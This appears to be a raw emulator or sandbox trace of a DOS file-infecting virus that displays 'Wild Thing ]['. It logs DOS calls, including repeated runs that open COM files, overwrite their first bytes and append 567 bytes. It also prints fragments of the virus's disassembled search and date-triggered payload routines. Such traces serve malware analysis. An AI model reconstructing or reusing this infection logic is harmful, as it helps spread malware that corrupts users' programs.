2018-12-25T12:42:07.834123944Z 61 PC: 131b2 | Open file (Filename = '')
2018-12-25T12:42:07.840445404Z 62 PC: 131ba | Close file
2018-12-25T12:42:07.842621123Z 51 PC: 1344c | Get or set Ctrl-Break
2018-12-25T12:42:07.844554009Z 74 PC: 1197c | Reallocate memory
2018-12-25T12:42:07.846129935Z 72 PC: 11991 | Allocate memory
2018-12-25T12:42:07.847925362Z 73 PC: 119b2 | Release memory
2018-12-25T12:42:07.850354067Z 72 PC: 119bd | Allocate memory
2018-12-25T12:42:07.85216594Z 73 PC: 119df | Release memory
2018-12-25T12:42:07.853606199Z 72 PC: 119f5 | Allocate memory
2018-12-25T12:42:07.856377606Z 72 PC: 119fd | Allocate memory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":14903,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:42:05.166689196Z 26 PC: 12c51 | Set disk transfer address
2018-12-25T12:42:05.169368199Z 44 PC: 12b0e | Get time
0x12b0e: cmp dh, 0
0x12b11: je 0x12b0a
0x12b13: mov byte ptr cs:[bp + 0x338], dh
0x12b18: mov ah, 0x47
0x12b1a: mov dl, 0
0x12b1c: lea si, word ptr [bp + 0x354]
0x12b20: int 0x21
0x12b22: call 0x12c13
0x12b25: call 0x12c37
0x12b28: mov ah, 0x4e
0x12b2a: lea dx, word ptr [bp + 0x2d4]
0x12b2e: mov cx, 7
0x12b31: int 0x21
0x12b33: jb 0x12b40
0x12b35: lea dx, word ptr [bp + 0x3b2]
0x12b39: call 0x12b75
0x12b3c: mov ah, 0x4f
0x12b3e: jmp 0x12b31
0x12b40: lea dx, word ptr [bp + 0x2ea]
0x12b44: mov ah, 0x3b
2018-12-25T12:42:05.171974652Z 71 PC: 12b22 | Get current directory
2018-12-25T12:42:05.175360384Z 42 PC: 12c17 | Get date
0x12c17: cmp al, 5
0x12c19: je 0x12c1c
0x12c1b: ret
0x12c1c: mov ah, 1
0x12c1e: mov cx, 0x2020
0x12c21: int 0x10
0x12c23: mov ah, 2
0x12c25: xor dx, dx
0x12c27: int 0x10
0x12c29: xor ax, ax
0x12c2b: int 0x10
0x12c2d: mov ah, 9
0x12c2f: lea dx, word ptr [bp + 0x27a]
0x12c33: int 0x21
0x12c35: jmp 0x12c35
0x12c37: mov ah, 0x4e
0x12c39: lea dx, word ptr [bp + 0x2da]
0x12c3d: mov cx, 7
0x12c40: int 0x21
0x12c42: jae 0x12c45
2018-12-25T12:42:05.179638217Z 78 PC: 12c42 | Find first file
2018-12-25T12:42:05.186893975Z 78 PC: 12b33 | Find first file
2018-12-25T12:42:05.193378132Z 67 PC: 12b7b | Get or set file attributes
2018-12-25T12:42:05.197573043Z 67 PC: 12b89 | Get or set file attributes
2018-12-25T12:42:05.210420064Z 61 PC: 12b90 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:42:05.217706563Z 87 PC: 12b98 | Get or set file date and time
2018-12-25T12:42:05.21969602Z 63 PC: 12bad | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:42:05.227867704Z 66 PC: 12c12 | Move file pointer
2018-12-25T12:42:05.229544733Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:42:05.232634523Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:05.235365692Z 64 PC: 12d36 | Write file or device (Write 567 bytes on handle 5)
2018-12-25T12:42:05.244376906Z 87 PC: 12bf8 | Get or set file date and time
2018-12-25T12:42:05.246852513Z 62 PC: 12bfc | Close file
2018-12-25T12:42:05.255759275Z 67 PC: 12c07 | Get or set file attributes
2018-12-25T12:42:05.266805109Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:05.269728156Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:05.276590991Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:05.287515864Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:05.295069449Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:05.29743445Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:05.30512764Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:05.306831865Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:05.309903586Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:05.312784985Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:05.32258491Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:05.324384491Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:05.335235452Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:05.34640541Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:05.349732271Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:05.358417665Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:05.370151377Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:05.377884539Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:05.380358921Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:05.387688284Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:05.389396261Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:05.399115864Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:05.401146528Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:05.410722882Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:05.413073118Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:05.421899587Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:05.432811307Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:05.436145724Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:05.443415713Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:05.454448435Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:05.469115243Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:05.472203882Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:05.479700695Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:05.481726598Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:05.486135795Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:05.488757772Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:05.498400551Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:05.501047549Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:05.515143903Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:05.526466045Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:05.531362435Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:05.539085581Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:05.550454619Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:05.558412479Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:05.561575563Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:05.569180224Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:05.571256522Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:05.575617877Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:05.578392539Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:05.588367984Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:05.591332068Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:05.601108021Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:05.612457881Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:05.616431023Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:05.624077684Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:05.635397825Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:05.643290211Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:05.646410768Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:05.654014866Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:05.656097881Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:05.660366541Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:05.663957617Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:05.674802544Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:05.67774742Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:05.687025808Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:05.698765697Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:05.702371356Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:05.710059911Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:05.725196266Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:05.733864829Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:05.73686916Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:05.74431064Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:05.746283987Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:05.75088737Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:05.753983593Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:05.763424561Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:05.766281719Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:05.775337167Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:05.786613927Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:05.790717852Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:05.798360165Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:05.80945954Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:05.817452344Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:05.820267788Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:05.827840863Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:05.829934421Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:05.839237255Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:05.850372844Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:05.853345971Z 59 PC: 12b48 | Change current directory
2018-12-25T12:42:05.859811484Z 59 PC: 12b52 | Change current directory
2018-12-25T12:42:05.862454542Z 26 PC: 12c51 | Set disk transfer address (See above)
2018-12-25T12:42:05.864030427Z 9 PC: 12b6a | Display string (String= 'Wild Thing ][ ')
2018-12-25T12:42:08.069766107Z 72 PC: 8f1b9 | Allocate memory
2018-12-25T12:42:08.071867428Z 72 PC: 8f1bd | Allocate memory
2018-12-25T12:42:08.074853726Z 99 PC: 90858 | Get DBCS lead byte table pointer
2018-12-25T12:42:08.078544377Z 61 PC: 91f88 | Open file (Filename = 'C:\WINDOWS\HIMEM.SYS')
2018-12-25T12:42:08.086085568Z 66 PC: 91f95 | Move file pointer
2018-12-25T12:42:08.087224438Z 62 PC: 91fc1 | Close file
2018-12-25T12:42:08.088703372Z 75 PC: 91fe0 | Execute program
2018-12-25T12:42:08.099093119Z 98 PC: 916f1 | Get current PSP
2018-12-25T12:42:08.099979994Z 9 PC: c605 | Display string (String= '6��r�&;] u')
2018-12-25T12:42:08.102586954Z 48 PC: c609 | Get DOS version
2018-12-25T12:42:08.105010896Z 9 PC: c382 | Display string (String= ' Installed A20 handler number ')
2018-12-25T12:42:08.106663244Z 2 PC: c38c | Character output (Char = '32')
2018-12-25T12:42:08.108135665Z 2 PC: c3a7 | Character output (Char = '2e')
2018-12-25T12:42:08.110783871Z 9 PC: c6d9 | Display string (String= '�����VH�VD���V@��������������_���Ku��t1��������D�����t �� ��������a1��Z�����W���� ������5���|�����(���������Nj�(��������p�^')
2018-12-25T12:42:08.113292685Z 9 PC: c6e0 | Display string (String= '�5���|�����(���������Nj�(��������p�^')
2018-12-25T12:42:08.116227448Z 61 PC: 91f88 | Open file (See above)
2018-12-25T12:42:08.123522098Z 66 PC: 91f95 | Move file pointer (See above)
2018-12-25T12:42:08.125053989Z 62 PC: 91fc1 | Close file (See above)
2018-12-25T12:42:08.127172765Z 75 PC: 91fe0 | Execute program (See above)
2018-12-25T12:42:08.152761148Z 98 PC: 916f1 | Get current PSP (See above)
2018-12-25T12:42:08.157134913Z 82 PC: 13d46 | Get DOS internal pointers (SYSVARS)
2018-12-25T12:42:08.158346328Z 53 PC: 13ac3 | Get interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T12:42:08.160005142Z 37 PC: 13ad6 | Set interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T12:42:08.161329528Z 53 PC: 13ae0 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:42:08.162634465Z 37 PC: 13af3 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:42:08.164721071Z 9 PC: 13a0d | Display string (Could not find end pointer)
2018-12-25T12:42:08.173536803Z 62 PC: 8f8eb | Close file
2018-12-25T12:42:08.17542127Z 62 PC: 8f8f2 | Close file
2018-12-25T12:42:08.178150562Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:08.180521412Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:08.182184801Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:08.184569203Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:08.187006261Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:08.188969009Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:08.190894006Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:08.19314367Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:08.194774536Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:08.196400231Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:08.198842733Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:08.200469195Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:08.202083833Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:08.205020616Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:08.206631988Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:08.208372004Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:08.213147817Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:08.214949793Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:08.216737805Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:08.218783539Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:08.220312698Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:08.221813876Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:08.223823169Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:08.225358686Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:08.226773705Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:08.22878614Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:08.230274851Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:08.231759851Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:08.233817908Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:08.235356429Z 61 PC: 8f8ff | Open file (Filename = '')
2018-12-25T12:42:08.24073686Z 62 PC: 8f90e | Close file
2018-12-25T12:42:08.24306955Z 69 PC: 8f915 | Duplicate handle
2018-12-25T12:42:08.244850776Z 69 PC: 8f919 | Duplicate handle
2018-12-25T12:42:08.246420997Z 61 PC: 9387b | Open file (Filename = '')
2018-12-25T12:42:08.252605426Z 68 PC: 9386b | I/O control for devices (Set for = '')
2018-12-25T12:42:08.254586809Z 61 PC: 9387b | Open file (See above)
2018-12-25T12:42:08.259861444Z 68 PC: 9386b | I/O control for devices (See above)
2018-12-25T12:42:08.263098612Z 74 PC: 8f9c4 | Reallocate memory
2018-12-25T12:42:08.265036629Z 72 PC: 8f9e0 | Allocate memory
2018-12-25T12:42:08.267140722Z 72 PC: 8f9e4 | Allocate memory
2018-12-25T12:42:08.269005696Z 74 PC: 8f9fb | Reallocate memory
2018-12-25T12:42:08.270811441Z 72 PC: 8fa02 | Allocate memory
2018-12-25T12:42:08.273047951Z 72 PC: 8fa06 | Allocate memory
2018-12-25T12:42:08.275636803Z 73 PC: 8fa11 | Release memory
2018-12-25T12:42:08.276988631Z 73 PC: 8efea | Release memory
2018-12-25T12:42:08.278473974Z 74 PC: 8f003 | Reallocate memory
2018-12-25T12:42:08.280914382Z 72 PC: 8f054 | Allocate memory
2018-12-25T12:42:08.282950589Z 72 PC: 8f058 | Allocate memory
2018-12-25T12:42:08.284851637Z 73 PC: 8f060 | Release memory
2018-12-25T12:42:08.287826039Z 61 PC: 8f080 | Open file (Filename = '')
2018-12-25T12:42:08.298592572Z 63 PC: 8f095 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:42:08.305044672Z 66 PC: 8f0ad | Move file pointer
2018-12-25T12:42:08.307789643Z 62 PC: 8f0d1 | Close file
2018-12-25T12:42:08.31055884Z 75 PC: 8f0f2 | Execute program
2018-12-25T12:42:08.333999034Z 80 PC: 12be9 | Set current PSP
2018-12-25T12:42:08.335646333Z 48 PC: 12bee | Get DOS version
2018-12-25T12:42:08.338835984Z 99 PC: 193d0 | Get DBCS lead byte table pointer
2018-12-25T12:42:08.34185947Z 101 PC: 12c74 | Get extended country info
2018-12-25T12:42:08.343652602Z 99 PC: 12c7a | Get DBCS lead byte table pointer
2018-12-25T12:42:08.34651927Z 74 PC: 12cdc | Reallocate memory
2018-12-25T12:42:08.34852553Z 72 PC: 1355d | Allocate memory
2018-12-25T12:42:08.350650405Z 25 PC: 13596 | Get default drive
2018-12-25T12:42:08.353032982Z 71 PC: 135ad | Get current directory
2018-12-25T12:42:08.355741667Z 59 PC: 135ba | Change current directory
2018-12-25T12:42:08.362811407Z 59 PC: 135c8 | Change current directory
2018-12-25T12:42:08.370721724Z 59 PC: 135d3 | Change current directory
2018-12-25T12:42:08.375056565Z 25 PC: 12d13 | Get default drive
2018-12-25T12:42:08.376815808Z 37 PC: 127d3 | Set interrupt vector (Interrupt = '34' AKA 'Random write')
2018-12-25T12:42:08.379412761Z 37 PC: 127da | Set interrupt vector (Interrupt = '35' AKA 'Get file size in records')
2018-12-25T12:42:08.38149053Z 37 PC: 127e1 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:42:08.384295965Z 80 PC: 1301d | Set current PSP
2018-12-25T12:42:08.38633547Z 37 PC: 13041 | Set interrupt vector (Interrupt = '46' AKA 'Set verify flag')
2018-12-25T12:42:08.388291144Z 53 PC: 13362 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:42:08.389978879Z 37 PC: 13383 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:42:08.392478243Z 51 PC: 13417 | Get or set Ctrl-Break
2018-12-25T12:42:08.394744534Z 72 PC: 130ec | Allocate memory
2018-12-25T12:42:08.40662796Z 61 PC: 131b2 | Open file (Filename = '')
2018-12-25T12:42:08.414363362Z 62 PC: 131ba | Close file
2018-12-25T12:42:08.417415534Z 51 PC: 1344c | Get or set Ctrl-Break
2018-12-25T12:42:08.419059691Z 74 PC: 1197c | Reallocate memory
2018-12-25T12:42:08.421219733Z 72 PC: 11991 | Allocate memory
2018-12-25T12:42:08.424307225Z 73 PC: 119b2 | Release memory
2018-12-25T12:42:08.426108865Z 72 PC: 119bd | Allocate memory
2018-12-25T12:42:08.428273906Z 73 PC: 119df | Release memory
2018-12-25T12:42:08.431135896Z 72 PC: 119f5 | Allocate memory
2018-12-25T12:42:08.433421756Z 72 PC: 119fd | Allocate memory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":14903,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:42:06.829478422Z 26 PC: 12c51 | Set disk transfer address
2018-12-25T12:42:06.832684391Z 44 PC: 12b0e | Get time
0x12b0e: cmp dh, 0
0x12b11: je 0x12b0a
0x12b13: mov byte ptr cs:[bp + 0x338], dh
0x12b18: mov ah, 0x47
0x12b1a: mov dl, 0
0x12b1c: lea si, word ptr [bp + 0x354]
0x12b20: int 0x21
0x12b22: call 0x12c13
0x12b25: call 0x12c37
0x12b28: mov ah, 0x4e
0x12b2a: lea dx, word ptr [bp + 0x2d4]
0x12b2e: mov cx, 7
0x12b31: int 0x21
0x12b33: jb 0x12b40
0x12b35: lea dx, word ptr [bp + 0x3b2]
0x12b39: call 0x12b75
0x12b3c: mov ah, 0x4f
0x12b3e: jmp 0x12b31
0x12b40: lea dx, word ptr [bp + 0x2ea]
0x12b44: mov ah, 0x3b
2018-12-25T12:42:06.83479831Z 71 PC: 12b22 | Get current directory
2018-12-25T12:42:06.837547248Z 42 PC: 12c17 | Get date
0x12c17: cmp al, 5
0x12c19: je 0x12c1c
0x12c1b: ret
0x12c1c: mov ah, 1
0x12c1e: mov cx, 0x2020
0x12c21: int 0x10
0x12c23: mov ah, 2
0x12c25: xor dx, dx
0x12c27: int 0x10
0x12c29: xor ax, ax
0x12c2b: int 0x10
0x12c2d: mov ah, 9
0x12c2f: lea dx, word ptr [bp + 0x27a]
0x12c33: int 0x21
0x12c35: jmp 0x12c35
0x12c37: mov ah, 0x4e
0x12c39: lea dx, word ptr [bp + 0x2da]
0x12c3d: mov cx, 7
0x12c40: int 0x21
0x12c42: jae 0x12c45
2018-12-25T12:42:06.84071635Z 78 PC: 12c42 | Find first file
2018-12-25T12:42:06.846514441Z 78 PC: 12b33 | Find first file
2018-12-25T12:42:06.852334963Z 67 PC: 12b7b | Get or set file attributes
2018-12-25T12:42:06.859871582Z 67 PC: 12b89 | Get or set file attributes
2018-12-25T12:42:06.875923011Z 61 PC: 12b90 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:42:06.882335505Z 87 PC: 12b98 | Get or set file date and time
2018-12-25T12:42:06.884558587Z 63 PC: 12bad | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:42:06.891325114Z 66 PC: 12c12 | Move file pointer
2018-12-25T12:42:06.89299824Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:42:06.895909845Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:06.898538094Z 64 PC: 12d36 | Write file or device (Write 567 bytes on handle 5)
2018-12-25T12:42:06.907280205Z 87 PC: 12bf8 | Get or set file date and time
2018-12-25T12:42:06.909052043Z 62 PC: 12bfc | Close file
2018-12-25T12:42:06.930771726Z 67 PC: 12c07 | Get or set file attributes
2018-12-25T12:42:06.940210782Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:06.943032054Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:06.94936483Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:06.959001338Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:06.965590965Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:06.968766685Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:06.975073922Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:06.976353434Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:06.982592818Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:06.994487762Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:07.003190364Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:07.005415223Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:07.012826071Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:07.022297738Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:07.025897893Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:07.031424554Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:07.041254024Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:07.048383783Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:07.062577243Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:07.069289821Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:07.071073534Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:07.07510222Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:07.077188799Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:07.085724203Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:07.088050285Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:07.095865825Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:07.106108562Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:07.109785496Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:07.11564803Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:07.125443653Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:07.133588887Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:07.13562192Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:07.142164755Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:07.144546775Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:07.14773276Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:07.149700723Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:07.157981269Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:07.16066888Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:07.168798729Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:07.178709593Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:07.182465102Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:07.188225946Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:07.197929493Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:07.205553095Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:07.207151202Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:07.213925064Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:07.216300537Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:07.219272216Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:07.221165112Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:07.229987516Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:07.2320512Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:07.240167335Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:07.250442217Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:07.253642526Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:07.259381823Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:07.269739457Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:07.276691887Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:07.278227559Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:07.285290739Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:07.28715498Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:07.289939847Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:07.29204533Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:07.302422681Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:07.30408602Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:07.31173149Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:07.322415016Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:07.325161771Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:07.330897866Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:07.341277691Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:07.352449663Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:07.353739327Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:07.361042377Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:07.362606208Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:07.365383229Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:07.367951696Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:07.376179949Z 87 PC: 12bf8 | Get or set file date and time (See above)
